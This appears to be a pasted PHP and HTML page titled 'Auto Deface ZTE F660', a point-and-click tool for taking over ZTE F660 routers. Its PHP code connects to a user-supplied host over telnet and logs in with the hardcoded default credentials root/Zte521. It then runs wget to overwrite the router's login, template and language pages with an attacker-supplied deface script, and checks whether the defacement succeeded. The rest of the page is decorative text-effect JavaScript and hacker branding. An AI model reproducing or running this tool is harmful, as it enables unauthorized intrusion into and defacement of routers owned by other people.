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Feb 17th, 2016
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  1. <html>
  2. <head>
  3. <link rel="SHORTCUT ICON" href="">
  4. <title>Auto Deface ZTE F660</title>
  5. <meta content='Ref' name='copyright'/>
  6. <meta content='Ref' name='author'/>
  7. <meta name="robots" content="index, follow">
  8. <meta name="keywords" content="Hacking ZTE F660">
  9. <meta name="description" content="Replace ZTE F660 System">
  10. <meta name="author" content="Ref">
  11. <meta name="googlebot" content="index, follow">
  12. <meta name="rating" content="general">
  13. <meta name="copyright" content="Ref @ 2016. All rights reserved.">
  14. <meta name="language" content="en">
  15. <meta name="web_content_type" content="Personal Website">
  16. <meta name="country" content="id, en">
  17. <meta name="contact" content="Ref">
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  55. /*
  56. Uphill Text effect
  57. By JavaScript Kit (
  58. Over 400+ free scripts here!
  59. */
  61. function uphilltext(text){
  62. var temptext=text.toUpperCase()
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  76. <body><center>
  77. <font color="red" face="Iceland" size="67">[!]Hacking Router F660[!]<br></font>
  78. <img src=" width="100" height="100"><br>
  79. <font face="Iceland" color="white" size="5">Herp Watching You!</font><br><br>
  80. <font face="Iceland" color="white" size="4">
  81. <?php
  82. error_log(0);
  83. if($_POST) {
  84. $sc = $_POST['sc'];
  85. $host = $_POST['host'];
  86. $port = $_POST['port'];
  87. $user = "root";
  88. $pass = "Zte521";
  89. $socket = fsockopen($host, $port) or die ($host." Die !");
  90. sleep(5);
  91. fputs($socket, "$user\r\n");
  92. sleep(4);
  93. fputs($socket, "$pass\r\n");
  94. sleep(4);
  95. fputs($socket, "cd home/httpd \r\n");
  96. sleep(4);
  97. fputs($socket,"wget -O login.gch $sc \r\n");
  98. sleep(5);
  99. fputs($socket,"wget -O template.gch $sc \r\n");
  100. sleep(5);
  101. fputs($socket,"wget -O setlang.gch $sc \r\n");
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  103. fclose($socket);
  104. $bs = file_get_contents("http://$host");
  105. if(preg_match("#hacked#si",$bs)){
  106. echo "<a href=\"http://$host\" target=\"_BLANK\">$host</a> Succesfully Defaced ! Nice <br>";
  107. echo "<a href=\"$host\" target=\"_BLANK\">IP Info :</a><hr>";
  108. } else { echo "Failed to Deface , Find other Target<br>"; }
  109. }
  110. else {
  111. echo "<center><form method=\"post\" action=\"?f660\"><input class=\"depth\" type=\"text\" name=\"host\" placeholder=\"\">\n";
  112. echo "<select class=\"depth\" name=\"port\">\n";
  113. echo " <option value=\"23\">23</option>\n";
  114. echo " <option value=\"1023\">1023</option>\n";
  115. echo "</select>\n";
  116. echo "<input class=\"depth\" type=\"text\" name=\"sc\" placeholder=\"URL Deface Script\">\n";
  117. echo "<hr><input type=\"submit\" class=\"Button\" value=\"Hack\" >\n";
  118. echo "<hr>*Input Target Without http://<br>*Default Port 23<br>*URL Deface Script , for Example<hr>\n";
  119. echo "<center>\n";
  120. }
  121. ?>
  122. <a href="#Ganteng"><script language="JavaScript1.2">
  124. /*
  125. Neon Lights Text
  126. By JavaScript Kit (
  127. Over 400+ free scripts here!
  128. */
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  167. n=0
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  178. beginneon()
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  182. </html>
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